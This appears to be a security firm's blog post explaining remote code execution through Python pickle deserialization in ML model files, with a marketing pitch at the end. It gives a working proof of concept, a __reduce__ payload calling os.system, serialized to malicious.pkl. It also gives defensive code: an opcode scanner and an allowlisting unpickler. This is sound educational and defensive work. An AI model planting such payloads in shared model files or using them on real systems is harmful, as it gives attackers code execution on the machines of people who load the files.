Deep-Dive

The Simplest Bug is the Deadliest: Remote Code Execution (RCE) via Pickle in Machine Learning

Eresus Security Research Team
April 1, 2026
3 min read

Sometimes the simplest bugs are the most dangerous—especially when they’ve been hiding in plain sight. In the world of Machine Learning (ML), data scientists download and load hundreds of pre-trained models every day. However, a classic habit in the industry—using Python's pickle.load()—opens the door wide to Remote Code Execution (RCE).

The Short Answer: Python’s built-in pickle module, heavily used to serialize and deserialize machine learning models (.pkl files), is inherently unsafe. Deserializing a malicious .pkl file doesn’t just unpack data; it executes code. Loading an untrusted model file is enough for an attacker to run arbitrary operating system commands on your servers. At Eresus Security, we strongly recommend abandoning .pkl formats in favor of secure alternatives like safetensors to prevent these types of Model File Vulnerabilities (MFVs) in ML pipelines.


1. The Vulnerability Explained: Pickle Doesn't Just Read, It Acts

The primary purpose of the pickle module is to serialize (dump) an object and deserialize (load) it later. The fatal flaw lies in how pickle.load() operates: when reconstructing an object, it invokes the special __reduce__() method.

If a malicious actor overrides this method to return a callable such as os.system together with its arguments, pickle simply invokes it without validation. You don't need to bypass parsers or deal with memory corruption; just passing the file to the load() function is the trigger. It is stupidly simple, yet devastating.
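You can see this contract without any malicious code at all. The sketch below (our own illustration, using the harmless builtin print in place of os.system) shows that __reduce__() returns a (callable, args) tuple, and that the pickle byte stream stores the callable by name, ready to be imported and invoked on load:

```python
import io
import pickle
import pickletools

# Illustrative class: __reduce__ returns (callable, args), and
# pickle.load() later calls callable(*args). We use print here
# instead of os.system so the demo stays harmless.
class Demo:
    def __reduce__(self):
        return (print, ("reconstructed by pickle.load()",))

data = pickle.dumps(Demo())

# The callable is stored by *name* in the byte stream; disassembling
# it shows the STACK_GLOBAL (import) and REDUCE (call) opcodes.
out = io.StringIO()
pickletools.dis(data, out=out)
print(out.getvalue())
```

The disassembly makes the danger concrete: the stream does not contain the Demo class at all, only an instruction to import builtins.print and call it. Swap in posix.system and the same machinery runs shell commands.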

2. Proof of Concept (PoC)

Exploiting this flaw doesn’t require reverse engineering. Here is a step-by-step demonstration of how a malicious model file is crafted:

Step 1: Craft the Payload

The attacker creates a Python class that hijacks the __reduce__() method:

import pickle
import os

class Malicious:
    def __reduce__(self):
        # On load, pickle will call os.system("touch /tmp/poc") on the victim's machine
        return (os.system, ("touch /tmp/poc",))

Step 2: Serialize the Payload

The attacker packages this malicious object as a standard model file (.pkl) and uploads it to the web:

# Serialize the malicious object
payload = pickle.dumps(Malicious())

# Save it to a file
with open("malicious.pkl", "wb") as f:
    f.write(payload)

Step 3: Simulate the Victim

An innocent data scientist or backend machine learning microservice simply tries to load the model:

import pickle

with open("malicious.pkl", "rb") as f:
    pickle.load(f) # <- The point of no return

At this point, the file /tmp/poc appears out of thin air on the victim's server: absolute proof of arbitrary code execution.
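Note that a payload like this can be spotted without ever calling load(): pickletools can walk the opcode stream statically. Here is a heuristic scanner of our own devising (not a standard tool; ordinary pickles of class instances will also trip NEWOBJ/BUILD, so it errs toward false positives):

```python
import pickle
import pickletools

# Opcodes that can import a global or invoke a callable during load.
DANGEROUS = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
             "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}

def looks_dangerous(data: bytes) -> bool:
    """Statically walk the opcode stream; the payload is never executed."""
    return any(op.name in DANGEROUS
               for op, _arg, _pos in pickletools.genops(data))

# Same PoC payload as above, redefined so this snippet is self-contained.
class Malicious:
    def __reduce__(self):
        import os
        return (os.system, ("touch /tmp/poc",))

print(looks_dangerous(pickle.dumps({"weights": [0.1, 0.2]})))  # plain data
print(looks_dangerous(pickle.dumps(Malicious())))              # calls os.system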


3. Why This Matters for Model File Vulnerabilities (MFVs)

This vulnerability is a textbook MFV. It isn't a bug in TensorFlow or PyTorch specifically; the behavior is baked into core Python itself.

  • Framework Agnostic: If a project relies on Pickle or HDF5-based files to save or load models, it's vulnerable across the board.
  • Easy Hunting Ground: Platforms like Kaggle, Hugging Face, or GitHub host millions of .pkl files. It only takes one poisoned model integrated into a corporate environment to create a full system compromise. If your application has a simple "Upload .pkl model" feature without robust checks, bug bounty hunters (and malicious hackers) will figure it out immediately.
  • Defending is Simple: Because of this very vulnerability, the modern MLOps standard is shifting heavily towards formats like safetensors, which store only raw tensor data and execute no code on load.
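When migrating to safetensors isn't immediately possible, the "restricting globals" pattern from the official Python pickle documentation offers a stopgap: subclass pickle.Unpickler and allowlist the only globals a legitimate file should need. A minimal sketch (the allowlist contents are illustrative, not a recommendation):

```python
import io
import os
import pickle

# Only these (module, name) pairs may be resolved during unpickling.
ALLOWED = {("builtins", "list"), ("builtins", "dict")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

# The PoC payload from earlier, redefined so this snippet is self-contained.
class Malicious:
    def __reduce__(self):
        return (os.system, ("touch /tmp/poc",))

payload = pickle.dumps(Malicious())

try:
    RestrictedUnpickler(io.BytesIO(payload)).load()
    blocked = False
except pickle.UnpicklingError:
    blocked = True  # os.system is not on the allowlist, so loading fails

print("payload blocked:", blocked)
```

Even so, allowlisting is defense in depth, not a guarantee; the durable fix remains moving model storage to a weights-only format like safetensors.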

4. Secure Your ML Pipelines with Eresus Security

Are the models powering your application silently harboring RCE potential?

Protecting a modern application isn’t just about putting a WAF in front of web forms—it’s about deeply analyzing how your AI and Data pipelines ingest files. Eresus Security goes beyond conventional penetration testing. We audit your MLOps pipelines end-to-end to ensure that simple deserialization flaws—and sophisticated Agentic AI security loop vulnerabilities—are eliminated before they hit production.